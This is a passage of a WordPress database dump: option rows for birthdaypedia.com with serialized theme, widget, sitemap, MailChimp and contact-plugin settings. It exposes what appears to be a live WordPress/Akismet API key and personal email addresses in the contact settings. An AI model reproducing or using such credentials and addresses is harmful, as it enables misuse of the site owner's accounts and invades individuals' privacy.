Width\";s:23:\"ct_categorypage_sidebar\";s:4:\"Left\";s:14:\"ct_live_search\";i:1;s:17:\"ct_search_results\";s:1:\"5\";s:20:\"ct_responsive_layout\";i:1;s:22:\"ct_exclude_search_page\";i:1;s:17:\"ct_custom_favicon\";s:62:\"[site_url]/wp-content/uploads/2015/10/BirthdaypediaFavicon.ico\";s:20:\"ct_header_background\";s:7:\"#aaaaaa\";s:24:\"ct_search_block_homepage\";s:1:\"0\";s:19:\"ct_logo_block_width\";s:8:\"col-lg-5\";s:21:\"ct_search_block_width\";s:8:\"col-lg-7\";s:12:\"ct_type_logo\";s:5:\"image\";s:14:\"ct_logo_upload\";s:47:\"[site_url]/wp-content/uploads/2015/06/logo1.png\";s:17:\"ct_top_block_show\";s:1:\"0\";s:11:\"ct_top_menu\";s:8:\"top_text\";s:16:\"ct_top_info_text\";s:218:\"<strong>TechDesk</strong> is a responsive helpdesk <strong>Theme For WordPress</strong>. <strong>Fully responsive</strong> design, homepage <strong>is built</strong> on the widgets, own <strong>support center</strong>.\";s:22:\"ct_topinfo_block_width\";s:8:\"col-lg-9\";s:26:\"ct_socialicons_block_width\";s:8:\"col-lg-3\";s:11:\"ct_sc_block\";i:1;s:25:\"introduction_social_icons\";s:114:\"<h3 style=\"margin: 0;\">Social Icons Settings</h3> To hide any icon, just remove the URL from the appropriate field\";s:12:\"ct_apple_url\";s:20:\"http://www.apple.com\";s:13:\"ct_flickr_url\";s:21:\"http://www.flickr.com\";s:13:\"ct_google_url\";s:21:\"http://www.google.com\";s:14:\"ct_twitter_url\";s:22:\"http://www.twitter.com\";s:15:\"ct_facebook_url\";s:23:\"http://www.facebook.com\";s:14:\"ct_sticky_menu\";i:1;s:16:\"ct_menu_position\";s:6:\"center\";s:18:\"ct_menu_background\";s:7:\"#4266d1\";s:12:\"ct_menu_font\";a:3:{s:4:\"size\";s:4:\"18px\";s:5:\"style\";s:4:\"bold\";s:5:\"color\";s:7:\"#ffffff\";}s:17:\"ct_menu_transform\";s:9:\"uppercase\";s:17:\"ct_menu_separator\";s:1:\"0\";s:21:\"ct_dd_menu_background\";s:7:\"#42586a\";s:27:\"ct_dd_menu_hover_background\";s:7:\"#ffffff\";s:21:\"ct_dd_menu_link_color\";s:7:\"#606060\";s:18:\"ct_dd_menu_opacity\";s:4:\"0.95\";s:18:\"ct_body_background\";s:7:\"#ffffff\";s:22:\"ct_links_hover_opacity\";i:1;s:14:\"ct_links_color\";s:7:\"#42586a\";s:19:\"ct_def_post_bgcolor\";s:7:\"#42586a\";s:18:\"ct_default_bg_type\";s:5:\"Color\";s:24:\"ct_default_bg_attachment\";s:5:\"Fixed\";s:20:\"ct_default_bg_repeat\";s:6:\"Repeat\";s:22:\"ct_default_bg_position\";s:4:\"Left\";s:24:\"ct_default_predefined_bg\";s:56:\"[site_url]/wp-content/themes/wp-techdesk/img/bg/bg01.jpg\";s:13:\"ct_font_types\";s:8:\"standard\";s:17:\"ct_standard_fonts\";s:5:\"Arial\";s:15:\"ct_google_fonts\";a:1:{s:4:\"face\";s:14:\"Carrois Gothic\";}s:8:\"ct_h_one\";a:4:{s:4:\"size\";s:4:\"38px\";s:6:\"height\";s:4:\"40px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:8:\"ct_h_two\";a:4:{s:4:\"size\";s:4:\"31px\";s:6:\"height\";s:4:\"40px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:10:\"ct_h_three\";a:4:{s:4:\"size\";s:4:\"24px\";s:6:\"height\";s:4:\"40px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:9:\"ct_h_four\";a:4:{s:4:\"size\";s:4:\"17px\";s:6:\"height\";s:4:\"20px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:9:\"ct_h_five\";a:4:{s:4:\"size\";s:4:\"14px\";s:6:\"height\";s:4:\"20px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:8:\"ct_h_six\";a:4:{s:4:\"size\";s:4:\"12px\";s:6:\"height\";s:4:\"20px\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#333333\";}s:15:\"ct_type_post_bg\";s:13:\"post_bg_color\";s:17:\"ct_excerpt_length\";s:3:\"140\";s:24:\"ct_pagination_background\";s:7:\"#42586a\";s:30:\"ct_pagination_background_hover\";s:7:\"#5b7a93\";s:22:\"introduction_blog_post\";s:52:\"<h3 style=\"margin: 0;\">Blog Post Meta Settings.</h3>\";s:12:\"ct_date_meta\";i:1;s:16:\"ct_comments_meta\";i:1;s:18:\"ct_categories_meta\";i:1;s:22:\"ct_featured_image_post\";i:1;s:16:\"ct_featured_type\";s:8:\"original\";s:18:\"ct_add_prettyphoto\";i:1;s:15:\"ct_about_author\";i:1;s:21:\"ct_post_comments_type\";s:8:\"standard\";s:24:\"introduction_single_post\";s:54:\"<h3 style=\"margin: 0;\">Single Post Meta Settings.</h3>\";s:19:\"ct_single_date_meta\";i:1;s:23:\"ct_single_comments_meta\";i:1;s:21:\"ct_single_author_meta\";i:1;s:25:\"ct_single_categories_meta\";i:1;s:20:\"ct_single_views_meta\";i:1;s:19:\"ct_single_tags_meta\";i:1;s:20:\"ct_code_about_author\";s:152:\"<a href=\"#\"><i class=\"icon-facebook-sign\"></i></a><a href=\"#\"><i class=\"icon-twitter-sign\"></i></a><a href=\"#\"><i class=\"icon-google-plus-sign\"></i></a>\";s:15:\"ct_widget_hover\";i:1;s:20:\"ct_widget_background\";s:7:\"#42586A\";s:32:\"ct_widget_background_color_hover\";s:7:\"#42586A\";s:20:\"ct_widget_title_font\";a:4:{s:4:\"size\";s:4:\"14px\";s:6:\"height\";s:4:\"20px\";s:5:\"style\";s:4:\"bold\";s:5:\"color\";s:7:\"#FFFFFF\";}s:20:\"ct_footer_background\";s:7:\"#42586a\";s:14:\"ct_footer_font\";a:2:{s:4:\"size\";s:4:\"12px\";s:5:\"color\";s:7:\"#CCCCCC\";}s:17:\"ct_copyright_info\";s:93:\"© 2015 All rights reserved - <a href \"http://www.birthdaypedia.com\" > Birthdaypedia.com </a>\";s:11:\"ct_add_info\";s:0:\"\";s:27:\"introduction_oauth_settings\";s:283:\"<h3 style=\"margin: 0;\">Auth Settings</h3> Visit <a target=\"_target\" href=\"https://dev.twitter.com/apps/\" title=\"Twitter\" rel=\"nofollow\">this link</a> in a new tab, sign in with your account, click on \"Create a new application\" and create your own keys in case you don\'t have already.\";s:0:\"\";s:0:\"\";s:19:\"ct_google_analytics\";s:0:\"\";s:12:\"ct_logo_text\";s:17:\"Birthdaypedia.com\";s:14:\"ct_logo_slogan\";s:0:\"\";s:14:\"ct_android_url\";s:0:\"\";s:15:\"ct_dribbble_url\";s:0:\"\";s:13:\"ct_github_url\";s:0:\"\";s:14:\"ct_youtube_url\";s:0:\"\";s:16:\"ct_instagram_url\";s:0:\"\";s:12:\"ct_skype_url\";s:0:\"\";s:16:\"ct_pinterest_url\";s:0:\"\";s:19:\"ct_default_bg_image\";s:0:\"\";s:13:\"ct_custom_css\";s:40:\".vc_gitem-zone-mini { display: none; }\r\n\";s:14:\"ct_disqus_name\";s:0:\"\";s:20:\"ct_code_blog_sharing\";s:0:\"\";s:15:\"ct_consumer_key\";s:0:\"\";s:18:\"ct_consumer_secret\";s:0:\"\";s:13:\"ct_user_token\";s:0:\"\";s:14:\"ct_user_secret\";s:0:\"\";s:9:\"of_backup\";s:0:\"\";s:11:\"of_transfer\";s:0:\"\";s:9:\"smof_init\";s:31:\"Fri, 09 Oct 2015 15:46:46 +0000\";s:18:\"nav_menu_locations\";a:1:{s:9:\"main_menu\";i:34;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1485545976;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:6:\"text-5\";}s:12:\"ct_home_area\";a:1:{i:0;s:17:\"ct_posts_widget-2\";}s:15:\"ct_home_sidebar\";a:2:{i:0;s:6:\"text-2\";i:1;s:6:\"text-4\";}s:17:\"ct_single_sidebar\";a:0:{}s:19:\"ct_category_sidebar\";a:0:{}s:15:\"ct_page_sidebar\";a:1:{i:0;s:21:\"ns_widget_mailchimp-2\";}s:9:\"ct_footer\";a:0:{}}}}','yes'),(6003,'wpb_js_composer_license_activation_notified','yes','yes'),(6619,'tadv_settings','a:6:{s:7:\"options\";s:15:\"menubar,advlist\";s:9:\"toolbar_1\";s:117:\"bold,italic,blockquote,bullist,numlist,alignleft,aligncenter,alignright,link,unlink,table,fullscreen,undo,redo,wp_adv\";s:9:\"toolbar_2\";s:121:\"formatselect,alignjustify,strikethrough,outdent,indent,pastetext,removeformat,charmap,wp_more,emoticons,forecolor,wp_help\";s:9:\"toolbar_3\";s:0:\"\";s:9:\"toolbar_4\";s:0:\"\";s:7:\"plugins\";s:107:\"anchor,code,insertdatetime,nonbreaking,print,searchreplace,table,visualblocks,visualchars,emoticons,advlist\";}','yes'),(6620,'tadv_admin_settings','a:1:{s:7:\"options\";a:0:{}}','yes'),(6621,'tadv_version','4000','yes'),(6628,'_transient_wpseo_sitemap_cache_page_1','<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>http://birthdaypedia.com/sample-page/</loc>\n <lastmod>2015-04-27T23:02:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/</loc>\n <lastmod>2015-10-09T20:52:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>1</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/privacy-policy/</loc>\n <lastmod>2015-07-29T05:46:00+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/terms-of-use/</loc>\n <lastmod>2015-07-29T16:52:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/about-us/</loc>\n <lastmod>2015-10-12T21:47:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n <image:image>\n <image:loc>http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg</image:loc>\n <image:caption><![CDATA[hed]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>http://birthdaypedia.com/birthdaypedia-guest-blogger/</loc>\n <lastmod>2015-10-12T19:24:20+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/contact-us-2/</loc>\n <lastmod>2015-10-12T21:06:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.8</priority>\n <image:image>\n <image:loc>http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg</image:loc>\n <image:caption><![CDATA[iStock 000008906483 Small]]></image:caption>\n </image:image>\n </url>\n</urlset>','no'),(6864,'wpb_js_custom_css','<script type=\"text/javascript\" src=\"//s3.amazonaws.com/downloads.mailchimp.com/js/signup-forms/popup/embed.js\" data-dojo-config=\"usePlainJson: true, isDebug: false\"></script><script type=\"text/javascript\">require([\"mojo/signup-forms/Loader\"], function(L) { L.start({\"baseUrl\":\"mc.us11.list-manage.com\",\"uuid\":\"3baa0f159654151aa9a3db431\",\"lid\":\"d29e4323fe\"}) })</script>','yes'),(6894,'widget_ns_widget_mailchimp','a:2:{i:2;a:7:{s:13:\"collect_first\";b:0;s:12:\"collect_last\";b:0;s:20:\"current_mailing_list\";s:10:\"d29e4323fe\";s:15:\"failure_message\";s:47:\"There was a problem processing your submission.\";s:11:\"signup_text\";s:21:\"Join The Celebration!\";s:15:\"success_message\";s:88:\"Thank you for joining our mailing list. Please check your email for a confirmation link.\";s:5:\"title\";s:29:\"Sign up for our mailing list!\";}s:12:\"_multiwidget\";i:1;}','yes'),(6898,'widget_calendar','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6899,'widget_ct_2columns_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6900,'widget_ct_catsubcat_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6901,'widget_ct_categories_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6902,'widget_ct_flickr_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6903,'widget_ct_instagram_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6904,'widget_ct-populararticles-widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6905,'widget_ct_recfaq_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6906,'widget_ct_posts_widget','a:3:{i:1;a:0:{}i:2;a:6:{s:5:\"title\";s:7:\"Writers\";s:9:\"num_posts\";s:1:\"6\";s:10:\"categories\";s:3:\"644\";s:12:\"show_related\";s:2:\"on\";s:9:\"show_meta\";N;s:10:\"background\";s:7:\"#42586A\";}s:12:\"_multiwidget\";i:1;}','yes'),(6907,'widget_ct_sticky_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6908,'widget_ct_twitter_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6909,'widget_nav_menu','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6910,'widget_pages','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6911,'widget_rev-slider-widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6913,'widget_tag_cloud','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(6978,'a3rev_wp_people_contact_plugin','contact_us_page_contact_people','yes'),(6979,'a3rev_wp_people_contact_lite_version','2.0.3','yes'),(6980,'a3rev_wp_people_contact_version','2.0.3','yes'),(6981,'a3rev_wp_people_contact_ultimate_version','2.0.3','yes'),(6982,'contact_us_page_id','414','yes'),(6983,'people_contact_global_settings','a:2:{s:20:\"grid_view_team_title\";s:0:\"\";s:13:\"grid_view_col\";i:2;}','yes'),(6984,'a3_people_contact_lite_clean_on_deletion','0','yes'),(6985,'people_contact_location_map_settings','a:7:{s:18:\"hide_maps_frontend\";i:0;s:10:\"zoom_level\";i:14;s:8:\"map_type\";s:7:\"ROADMAP\";s:14:\"map_width_type\";s:7:\"percent\";s:20:\"map_width_responsive\";i:100;s:15:\"map_width_fixed\";i:400;s:10:\"map_height\";i:400;}','yes'),(6986,'people_contact_grid_view_layout','a:17:{s:20:\"thumb_image_position\";s:4:\"left\";s:16:\"thumb_image_wide\";i:25;s:22:\"fix_thumb_image_height\";s:1:\"1\";s:18:\"thumb_image_height\";i:150;s:19:\"item_title_position\";s:5:\"above\";s:25:\"grid_view_item_background\";s:7:\"#FFFFFF\";s:21:\"grid_view_item_border\";a:5:{s:5:\"width\";s:3:\"1px\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#DBDBDB\";s:6:\"corner\";s:6:\"square\";s:13:\"rounded_value\";i:0;}s:21:\"grid_view_item_shadow\";a:7:{s:6:\"enable\";i:1;s:8:\"h_shadow\";s:3:\"5px\";s:8:\"v_shadow\";s:3:\"5px\";s:4:\"blur\";s:3:\"2px\";s:6:\"spread\";s:3:\"2px\";s:5:\"color\";s:7:\"#DBDBDB\";s:5:\"inset\";s:0:\"\";}s:26:\"grid_view_item_padding_top\";i:10;s:29:\"grid_view_item_padding_bottom\";i:10;s:27:\"grid_view_item_padding_left\";i:10;s:28:\"grid_view_item_padding_right\";i:10;s:22:\"item_image_border_type\";s:7:\"rounder\";s:21:\"item_image_background\";s:7:\"#FFFFFF\";s:17:\"item_image_border\";a:3:{s:5:\"width\";s:3:\"1px\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#DBDBDB\";}s:17:\"item_image_shadow\";a:7:{s:6:\"enable\";i:1;s:8:\"h_shadow\";s:3:\"5px\";s:8:\"v_shadow\";s:3:\"5px\";s:4:\"blur\";s:3:\"2px\";s:6:\"spread\";s:3:\"2px\";s:5:\"color\";s:7:\"#DBDBDB\";s:5:\"inset\";s:0:\"\";}s:18:\"item_image_padding\";i:2;}','yes'),(6987,'people_contact_grid_view_icon','a:8:{s:21:\"default_profile_image\";s:97:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/no-avatar.png\";s:20:\"grid_view_icon_phone\";s:100:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/p_icon_phone.png\";s:18:\"grid_view_icon_fax\";s:98:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/p_icon_fax.png\";s:21:\"grid_view_icon_mobile\";s:101:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/p_icon_mobile.png\";s:20:\"grid_view_icon_email\";s:100:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/p_icon_email.png\";s:20:\"grid_view_email_text\";s:10:\"Click Here\";s:22:\"grid_view_icon_website\";s:102:\"//birthdaypedia.com/wp-content/plugins/contact-us-page-contact-people/assets/images/p_icon_website.png\";s:22:\"grid_view_website_text\";s:13:\"Visit Website\";}','yes'),(6988,'people_email_inquiry_global_settings','a:34:{s:23:\"contact_form_type_other\";i:0;s:15:\"email_from_name\";s:13:\"BirthdayPedia\";s:18:\"email_from_address\";s:19:\"mmanetti@rave.media\";s:9:\"send_copy\";s:3:\"yes\";s:22:\"inquiry_form_bg_colour\";s:7:\"#FFFFFF\";s:23:\"inquiry_contact_heading\";s:32:\"This email will be delivered to:\";s:28:\"inquiry_contact_heading_font\";a:4:{s:4:\"size\";s:4:\"14px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#000000\";}s:22:\"inquiry_form_site_name\";s:13:\"BirthdayPedia\";s:27:\"inquiry_form_site_name_font\";a:4:{s:4:\"size\";s:4:\"28px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#000000\";}s:34:\"inquiry_form_profile_position_font\";a:4:{s:4:\"size\";s:4:\"14px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:4:\"bold\";s:5:\"color\";s:7:\"#000000\";}s:30:\"inquiry_form_profile_name_font\";a:4:{s:4:\"size\";s:4:\"14px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:4:\"bold\";s:5:\"color\";s:7:\"#000000\";}s:26:\"inquiry_contact_popup_text\";a:4:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#000000\";}s:23:\"inquiry_input_bg_colour\";s:7:\"#FAFAFA\";s:25:\"inquiry_input_font_colour\";s:7:\"#000000\";s:20:\"inquiry_input_border\";a:7:{s:5:\"width\";s:3:\"1px\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#CCCCCC\";s:15:\"top_left_corner\";s:1:\"3\";s:16:\"top_right_corner\";s:1:\"3\";s:19:\"bottom_right_corner\";s:1:\"3\";s:18:\"bottom_left_corner\";s:1:\"3\";}s:27:\"inquiry_contact_text_button\";s:4:\"SEND\";s:32:\"inquiry_contact_button_bg_colour\";s:7:\"#EE2B2B\";s:37:\"inquiry_contact_button_bg_colour_from\";s:7:\"#FBCACA\";s:35:\"inquiry_contact_button_bg_colour_to\";s:7:\"#EE2B2B\";s:29:\"inquiry_contact_button_border\";a:8:{s:5:\"width\";s:3:\"1px\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#EE2B2B\";s:6:\"corner\";s:7:\"rounded\";s:15:\"top_left_corner\";s:1:\"3\";s:16:\"top_right_corner\";s:1:\"3\";s:19:\"bottom_right_corner\";s:1:\"3\";s:18:\"bottom_left_corner\";s:1:\"3\";}s:27:\"inquiry_contact_button_font\";a:4:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:17:\"Arial, sans-serif\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#FFFFFF\";}s:27:\"contact_form_type_shortcode\";s:0:\"\";s:26:\"contact_form_3rd_open_type\";s:8:\"new_page\";s:18:\"inquiry_popup_type\";s:2:\"fb\";s:25:\"fancybox_center_on_scroll\";s:4:\"true\";s:22:\"fancybox_transition_in\";s:4:\"none\";s:23:\"fancybox_transition_out\";s:4:\"none\";s:17:\"fancybox_speed_in\";s:3:\"300\";s:18:\"fancybox_speed_out\";s:1:\"0\";s:22:\"fancybox_overlay_color\";s:7:\"#666666\";s:25:\"colorbox_center_on_scroll\";s:4:\"true\";s:19:\"colorbox_transition\";s:4:\"none\";s:14:\"colorbox_speed\";s:3:\"300\";s:22:\"colorbox_overlay_color\";s:7:\"#666666\";}','yes'),(6989,'people_email_inquiry_contact_success','Thanks for your inquiry - we\\\'ll be in touch with you as soon as possible!','yes'),(6990,'contact_page_global_reset_profile','no','yes'),(6991,'profile_email_page_id','','yes'),(6992,'people_contact_widget_information','a:5:{s:19:\"widget_info_address\";s:0:\"\";s:17:\"widget_info_phone\";s:0:\"\";s:15:\"widget_info_fax\";s:0:\"\";s:18:\"widget_info_mobile\";s:0:\"\";s:17:\"widget_info_email\";s:0:\"\";}','yes'),(6993,'people_contact_widget_content_before_maps','','yes'),(6994,'people_contact_widget_content_after_maps','','yes'),(6995,'people_contact_widget_email_contact_form','a:7:{s:24:\"widget_show_contact_form\";i:0;s:22:\"widget_input_shortcode\";s:0:\"\";s:22:\"widget_email_from_name\";s:13:\"BirthdayPedia\";s:25:\"widget_email_from_address\";s:17:\"glowens@gmail.com\";s:16:\"widget_send_copy\";s:3:\"yes\";s:15:\"widget_email_to\";s:17:\"glowens@gmail.com\";s:15:\"widget_email_cc\";s:0:\"\";}','yes'),(6996,'widget_hide_maps_frontend','0','yes'),(6997,'people_contact_widget_maps','a:5:{s:15:\"widget_location\";s:9:\"Australia\";s:17:\"widget_zoom_level\";i:16;s:15:\"widget_map_type\";s:7:\"ROADMAP\";s:17:\"widget_map_height\";i:150;s:24:\"widget_maps_callout_text\";s:0:\"\";}','yes'),(7261,'category_children','a:8:{i:517;a:2:{i:0;i:518;i:1;i:519;}i:521;a:2:{i:0;i:522;i:1;i:523;}i:524;a:6:{i:0;i:525;i:1;i:526;i:2;i:527;i:3;i:528;i:4;i:529;i:5;i:530;}i:531;a:10:{i:0;i:532;i:1;i:533;i:2;i:534;i:3;i:535;i:4;i:536;i:5;i:537;i:6;i:538;i:7;i:539;i:8;i:540;i:9;i:541;}i:544;a:6:{i:0;i:545;i:1;i:546;i:2;i:547;i:3;i:548;i:4;i:643;i:5;i:645;}i:543;a:12:{i:0;i:549;i:1;i:550;i:2;i:551;i:3;i:552;i:4;i:553;i:5;i:554;i:6;i:555;i:7;i:556;i:8;i:557;i:9;i:558;i:10;i:559;i:11;i:560;}i:561;a:12:{i:0;i:562;i:1;i:563;i:2;i:564;i:3;i:565;i:4;i:566;i:5;i:567;i:6;i:568;i:7;i:569;i:8;i:570;i:9;i:571;i:10;i:572;i:11;i:573;}i:529;a:7:{i:0;i:574;i:1;i:575;i:2;i:576;i:3;i:577;i:4;i:578;i:5;i:579;i:6;i:580;}}','yes'),(7597,'cloudflare_zone_name','birthdaypedia.com','yes'),(7598,'cloudflare_zone_name_set_once','TRUE','yes'),(7600,'cloudflare_api_key_set_once','TRUE','yes'),(7602,'cloudflare_api_email_set_once','TRUE','yes'),(7603,'cloudflare_protocol_rewrite','1','yes'),(12932,'theme_mods_twentyfourteen','a:2:{i:0;b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1453238089;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:6:\"text-5\";}s:9:\"sidebar-1\";a:0:{}s:9:\"sidebar-2\";a:3:{i:0;s:6:\"text-2\";i:1;s:6:\"text-4\";i:2;s:6:\"text-3\";}s:9:\"sidebar-3\";a:0:{}s:18:\"orphaned_widgets_1\";a:1:{i:0;s:21:\"ns_widget_mailchimp-2\";}}}}','yes'),(12948,'widget_mc_mm_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12949,'widget_td_block_authors_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12950,'widget_td_block_1_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12951,'widget_td_block_2_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12952,'widget_td_block_3_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12953,'widget_td_block_4_widget','a:3:{i:1;a:0:{}i:2;a:20:{s:12:\"custom_title\";s:7:\"POPULAR\";s:10:\"custom_url\";s:0:\"\";s:17:\"block_template_id\";s:0:\"\";s:12:\"header_color\";s:1:\"#\";s:17:\"header_text_color\";s:1:\"#\";s:5:\"limit\";s:1:\"4\";s:6:\"offset\";s:2:\"15\";s:8:\"post_ids\";s:0:\"\";s:11:\"category_id\";s:0:\"\";s:12:\"category_ids\";s:0:\"\";s:8:\"tag_slug\";s:0:\"\";s:9:\"autors_id\";s:0:\"\";s:20:\"installed_post_types\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:19:\"td_ajax_filter_type\";s:0:\"\";s:18:\"td_ajax_filter_ids\";s:0:\"\";s:21:\"td_filter_default_txt\";s:3:\"All\";s:18:\"td_ajax_preloading\";s:0:\"\";s:15:\"ajax_pagination\";s:0:\"\";s:29:\"ajax_pagination_infinite_stop\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(12954,'widget_td_block_5_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12955,'widget_td_block_7_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12956,'widget_td_block_8_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12957,'widget_td_block_9_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12958,'widget_td_block_10_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12959,'widget_td_block_11_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12960,'widget_td_block_12_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12961,'widget_td_block_13_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12962,'widget_td_block_14_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12963,'widget_td_block_16_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12964,'widget_td_block_17_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12965,'widget_td_block_18_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12966,'widget_td_block_19_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12967,'widget_td_block_20_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12968,'widget_td_block_21_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12969,'widget_td_block_popular_categories_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12970,'widget_td_block_slide_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(12971,'widget_td_block_text_with_title_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(15095,'site_icon','0','yes'),(15096,'medium_large_size_w','768','yes'),(15097,'medium_large_size_h','0','yes'),(15785,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(15786,'akismet_strictness','0','yes'),(15787,'akismet_show_user_comments_approved','0','yes'),(15788,'wordpress_api_key','ae5e8594e1da','yes'),(21264,'widget_wpe_powered_by_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25378,'wpss_v4','2','yes'),(25384,'wpseo_sitemap_1_cache_validator','2e3s6','no'),(25385,'wpseo_sitemap_author_cache_validator','5lTWY','no'),(25398,'wpseo_sitemap_attachment_cache_validator','4QTtM','no'),(25399,'wpseo_sitemap_post_cache_validator','2e3s8','no'),(25400,'wpseo_sitemap_category_cache_validator','Wi9N','no'),(25401,'wpseo_sitemap_post_tag_cache_validator','5doRh','no'),(25403,'wpseo_sitemap_revision_cache_validator','72Gj2','no'),(25409,'wpseo_sitemap_cache_validator_global','4Wt5G','no'),(25533,'widget_td_block_22_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25534,'widget_td_block_23_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25535,'widget_td_block_24_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25536,'widget_td_block_25_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25537,'widget_td_block_weather_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25538,'widget_td_